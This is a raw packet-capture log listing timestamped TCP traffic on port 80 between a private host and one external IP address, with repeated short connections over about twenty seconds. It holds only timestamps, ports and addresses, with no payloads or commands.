Apr 6, 2024 09:29:55.283339024 CEST	80	49760	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:55.538187027 CEST	80	49760	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:55.538306952 CEST	49760	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:55.539098978 CEST	80	49760	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:55.539154053 CEST	49760	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:55.662071943 CEST	80	49760	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:55.685827971 CEST	49761	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:55.810337067 CEST	80	49761	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:55.810587883 CEST	49761	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:55.812911034 CEST	49761	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:55.937849045 CEST	80	49761	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:55.937916040 CEST	49761	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:56.062553883 CEST	80	49761	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:56.323726892 CEST	80	49761	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:56.323829889 CEST	49761	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:56.324425936 CEST	80	49761	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:56.324469090 CEST	49761	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:56.448436022 CEST	80	49761	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:56.468707085 CEST	49762	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:56.592983007 CEST	80	49762	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:56.593101025 CEST	49762	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:56.595283031 CEST	49762	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:56.719453096 CEST	80	49762	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:56.719551086 CEST	49762	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:56.843991995 CEST	80	49762	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:57.097526073 CEST	80	49762	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:57.097722054 CEST	49762	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:57.097984076 CEST	80	49762	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:57.098031044 CEST	49762	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:57.221846104 CEST	80	49762	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:57.233215094 CEST	49763	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:57.357945919 CEST	80	49763	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:57.358062983 CEST	49763	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:57.360186100 CEST	49763	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:57.484736919 CEST	80	49763	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:57.484811068 CEST	49763	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:57.609328032 CEST	80	49763	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:57.853610039 CEST	80	49763	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:57.853718996 CEST	49763	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:57.854031086 CEST	80	49763	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:57.854084969 CEST	49763	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:57.978283882 CEST	80	49763	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:58.001969099 CEST	49764	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:58.126297951 CEST	80	49764	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:58.126447916 CEST	49764	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:58.128552914 CEST	49764	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:58.252784014 CEST	80	49764	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:58.252881050 CEST	49764	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:58.377034903 CEST	80	49764	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:58.658344984 CEST	80	49764	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:58.658449888 CEST	49764	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:58.658452988 CEST	80	49764	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:58.658498049 CEST	49764	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:58.782505035 CEST	80	49764	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:58.794194937 CEST	49765	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:58.918582916 CEST	80	49765	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:58.918721914 CEST	49765	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:58.921065092 CEST	49765	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:59.047880888 CEST	80	49765	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:59.047959089 CEST	49765	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:59.172566891 CEST	80	49765	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:59.422697067 CEST	80	49765	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:59.422786951 CEST	80	49765	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:59.422893047 CEST	49765	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:59.422941923 CEST	49765	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:59.547527075 CEST	80	49765	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:59.563855886 CEST	49766	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:59.687755108 CEST	80	49766	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:59.687869072 CEST	49766	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:59.690030098 CEST	49766	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:59.813761950 CEST	80	49766	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:59.813829899 CEST	49766	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:59.937824011 CEST	80	49766	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:00.210206985 CEST	80	49766	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:00.210230112 CEST	80	49766	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:00.210315943 CEST	49766	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:00.210350037 CEST	49766	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:00.334291935 CEST	80	49766	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:00.367424011 CEST	49767	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:00.491127968 CEST	80	49767	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:00.491240025 CEST	49767	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:00.493398905 CEST	49767	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:00.617175102 CEST	80	49767	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:00.617283106 CEST	49767	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:00.741267920 CEST	80	49767	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:01.013169050 CEST	80	49767	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:01.013185978 CEST	80	49767	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:01.013267040 CEST	49767	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:01.013350010 CEST	49767	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:01.137029886 CEST	80	49767	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:01.153121948 CEST	49768	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:01.276949883 CEST	80	49768	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:01.277098894 CEST	49768	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:01.279269934 CEST	49768	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:01.403146982 CEST	80	49768	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:01.403219938 CEST	49768	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:01.527308941 CEST	80	49768	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:01.774059057 CEST	80	49768	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:01.774199009 CEST	49768	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:01.774239063 CEST	80	49768	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:01.774287939 CEST	49768	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:01.898243904 CEST	80	49768	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:01.919945002 CEST	49769	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:02.044143915 CEST	80	49769	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:02.044282913 CEST	49769	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:02.046577930 CEST	49769	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:02.170716047 CEST	80	49769	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:02.170840979 CEST	49769	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:02.295347929 CEST	80	49769	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:02.541439056 CEST	80	49769	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:02.541552067 CEST	49769	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:02.541810036 CEST	80	49769	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:02.541853905 CEST	49769	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:02.665853977 CEST	80	49769	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:02.685656071 CEST	49770	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:02.812589884 CEST	80	49770	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:02.812721014 CEST	49770	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:02.814836979 CEST	49770	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:02.938638926 CEST	80	49770	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:02.938760042 CEST	49770	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:03.062566042 CEST	80	49770	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:03.323903084 CEST	80	49770	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:03.324026108 CEST	49770	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:03.324048042 CEST	80	49770	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:03.324095011 CEST	49770	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:03.447981119 CEST	80	49770	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:03.477569103 CEST	49771	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:03.601478100 CEST	80	49771	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:03.601577044 CEST	49771	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:03.603579044 CEST	49771	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:03.727524042 CEST	80	49771	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:03.727606058 CEST	49771	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:03.851625919 CEST	80	49771	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:04.092643023 CEST	80	49771	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:04.092853069 CEST	80	49771	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:04.092865944 CEST	49771	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:04.092899084 CEST	49771	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:04.216835022 CEST	80	49771	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:04.232812881 CEST	49772	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:04.357191086 CEST	80	49772	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:04.357285023 CEST	49772	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:04.359603882 CEST	49772	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:04.484035015 CEST	80	49772	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:04.484122038 CEST	49772	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:04.608359098 CEST	80	49772	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:04.861344099 CEST	80	49772	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:04.861470938 CEST	49772	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:04.861809969 CEST	80	49772	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:04.861860991 CEST	49772	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:04.985609055 CEST	80	49772	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:04.998666048 CEST	49773	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:05.122525930 CEST	80	49773	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:05.122651100 CEST	49773	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:05.124910116 CEST	49773	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:05.251827955 CEST	80	49773	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:05.251928091 CEST	49773	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:05.375884056 CEST	80	49773	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:05.618626118 CEST	80	49773	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:05.618874073 CEST	49773	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:05.619446993 CEST	80	49773	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:05.619498968 CEST	49773	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:05.742762089 CEST	80	49773	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:05.765310049 CEST	49774	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:05.889327049 CEST	80	49774	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:05.889456034 CEST	49774	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:05.891669989 CEST	49774	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:06.015471935 CEST	80	49774	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:06.015583992 CEST	49774	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:06.139600039 CEST	80	49774	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:06.400134087 CEST	80	49774	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:06.401072979 CEST	80	49774	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:06.401158094 CEST	49774	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:06.418792009 CEST	49774	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:06.542860031 CEST	80	49774	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:06.613369942 CEST	49775	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:06.737298012 CEST	80	49775	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:06.737437963 CEST	49775	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:06.739588022 CEST	49775	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:06.863360882 CEST	80	49775	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:06.863511086 CEST	49775	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:06.987536907 CEST	80	49775	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:07.233756065 CEST	80	49775	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:07.233773947 CEST	80	49775	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:07.233860016 CEST	49775	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:07.234668970 CEST	49775	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:07.358388901 CEST	80	49775	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:08.854015112 CEST	49776	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:08.978426933 CEST	80	49776	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:08.978564024 CEST	49776	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:08.980640888 CEST	49776	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:09.104979038 CEST	80	49776	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:09.105062008 CEST	49776	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:09.229522943 CEST	80	49776	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:09.486944914 CEST	80	49776	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:09.487061024 CEST	80	49776	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:09.487189054 CEST	49776	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:09.487296104 CEST	49776	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:09.611356974 CEST	80	49776	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:09.631249905 CEST	49777	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:09.755645990 CEST	80	49777	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:09.755799055 CEST	49777	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:09.757970095 CEST	49777	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:09.882170916 CEST	80	49777	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:09.882371902 CEST	49777	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:10.006520987 CEST	80	49777	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:10.268945932 CEST	80	49777	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:10.268966913 CEST	80	49777	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:10.269057035 CEST	49777	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:10.269159079 CEST	49777	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:10.394047976 CEST	80	49777	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:10.405397892 CEST	49778	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:10.529427052 CEST	80	49778	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:10.529519081 CEST	49778	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:10.531873941 CEST	49778	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:10.655771971 CEST	80	49778	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:10.655966997 CEST	49778	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:10.779702902 CEST	80	49778	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:11.039398909 CEST	80	49778	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:11.039510012 CEST	80	49778	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:11.039572001 CEST	49778	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:11.039589882 CEST	49778	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:11.163227081 CEST	80	49778	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:11.187144041 CEST	49780	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:11.311841011 CEST	80	49780	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:11.311966896 CEST	49780	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:11.314148903 CEST	49780	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:11.438638926 CEST	80	49780	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:11.438782930 CEST	49780	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:11.563414097 CEST	80	49780	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:11.828299999 CEST	80	49780	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:11.828329086 CEST	80	49780	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:11.828382015 CEST	49780	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:11.828421116 CEST	49780	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:11.954758883 CEST	80	49780	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:11.969815016 CEST	49781	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:12.094449043 CEST	80	49781	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:12.094608068 CEST	49781	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:12.096910954 CEST	49781	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:12.221014023 CEST	80	49781	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:12.221122026 CEST	49781	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:12.345254898 CEST	80	49781	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:12.595292091 CEST	80	49781	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:12.595524073 CEST	49781	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:12.595827103 CEST	80	49781	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:12.595887899 CEST	49781	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:12.719662905 CEST	80	49781	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:12.734941006 CEST	49782	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:12.858865976 CEST	80	49782	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:12.858973980 CEST	49782	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:12.861150980 CEST	49782	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:12.984992027 CEST	80	49782	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:12.985090017 CEST	49782	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:13.109092951 CEST	80	49782	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:13.376586914 CEST	80	49782	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:13.376672029 CEST	80	49782	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:13.376733065 CEST	49782	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:13.376765013 CEST	49782	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:13.501271009 CEST	80	49782	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:13.525943995 CEST	49784	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:13.650204897 CEST	80	49784	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:13.650437117 CEST	49784	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:13.652600050 CEST	49784	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:13.776693106 CEST	80	49784	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:13.776787043 CEST	49784	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:13.900944948 CEST	80	49784	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:14.150090933 CEST	80	49784	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:14.150106907 CEST	80	49784	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:14.150208950 CEST	49784	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:14.150247097 CEST	49784	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:14.274447918 CEST	80	49784	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:14.296461105 CEST	49785	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:14.420772076 CEST	80	49785	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:14.420900106 CEST	49785	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:14.423119068 CEST	49785	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:14.548263073 CEST	80	49785	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:14.548338890 CEST	49785	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:14.672467947 CEST	80	49785	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:14.937064886 CEST	80	49785	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:14.937231064 CEST	49785	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:14.937237978 CEST	80	49785	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:14.937287092 CEST	49785	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:15.061745882 CEST	80	49785	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:15.078648090 CEST	49786	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:15.202789068 CEST	80	49786	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:15.202882051 CEST	49786	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:15.205071926 CEST	49786	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:15.329165936 CEST	80	49786	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:15.329281092 CEST	49786	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:15.453299999 CEST	80	49786	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:15.706084967 CEST	80	49786	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:15.706187963 CEST	49786	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:15.706609964 CEST	80	49786	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:15.706660986 CEST	49786	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:15.830499887 CEST	80	49786	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:15.846818924 CEST	49787	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:15.970638037 CEST	80	49787	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:15.970756054 CEST	49787	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:15.972978115 CEST	49787	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:16.109113932 CEST	80	49787	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:16.109186888 CEST	49787	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:16.233985901 CEST	80	49787	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:16.844116926 CEST	80	49787	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:16.844206095 CEST	80	49787	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:16.844257116 CEST	49787	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:16.844295025 CEST	49787	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:16.968101978 CEST	80	49787	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:16.985919952 CEST	49788	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:17.109761000 CEST	80	49788	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:17.109884024 CEST	49788	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:17.112020969 CEST	49788	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:17.235722065 CEST	80	49788	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:17.235830069 CEST	49788	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:17.359725952 CEST	80	49788	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:17.620068073 CEST	80	49788	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:17.620230913 CEST	49788	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:17.620274067 CEST	80	49788	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:17.620321989 CEST	49788	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:17.744050026 CEST	80	49788	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:17.767009020 CEST	49789	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:17.891052008 CEST	80	49789	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:17.891134024 CEST	49789	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:17.895021915 CEST	49789	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:18.018853903 CEST	80	49789	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:18.018956900 CEST	49789	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:18.142760992 CEST	80	49789	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:18.399833918 CEST	80	49789	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:18.399947882 CEST	80	49789	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:18.400052071 CEST	49789	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:18.400118113 CEST	49789	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:18.523912907 CEST	80	49789	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:18.547517061 CEST	49790	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:30:18.672034025 CEST	80	49790	172.67.148.126	192.168.2.6
Apr 6, 2024 09:30:18.672204018 CEST	49790	80	192.168.2.6	172.67.148.126
